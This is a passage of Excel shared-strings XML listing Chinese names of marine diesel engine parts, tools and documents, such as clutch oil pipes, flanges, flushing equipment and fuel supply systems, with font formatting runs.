        <charset val="134"/>
      </rPr>
      <t>油堵</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力增加</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油泵</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油堵</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>备用泵</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油堵</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离合器管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>堵头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蓄压器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离合器管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>堵头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离合器输入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离合器管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>堵头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离合器输出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离合器管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>堵头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离合器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带法兰吸入管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吸入管的管截面</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吸入管法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吸入管支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带法兰伺服油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离合器油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内部</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离合器油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外部</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带法兰离合器油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离合器油管截面</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>快速接头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸的</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>快速接头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凹的</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>与发动机相关的齿轮工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离合器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆锥毂推动工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压进心轴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺纹适配器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>提升工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中心销</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>提升工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>对接法兰工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定位管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>应急控制</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传输工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮传递</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺钉</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮传递</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮传送适配器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮传递</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冲洗设备</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冲洗软管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冲洗过滤包</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>过滤包</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支架总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>交叉臂</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷嘴塞子</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧配螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>角度球形接头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带螺母的角度球</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>单独的</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测试图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间轴</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>试车台</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>奥格斯堡图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>未指明的描述</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>未指明的信息号</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扭振数据表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰列表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>建筑图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>固定说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>板选择图表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统描述</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>产品手册</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>流程图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>符号列表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴列表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蒸汽系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>供水系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柴油供给系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>重油供给系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油供给系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>混合单元</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>关键设计</t>
    </r>
  </si>
  <si>
    <r>
      <t>IMO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>认可</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>概略计算等</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
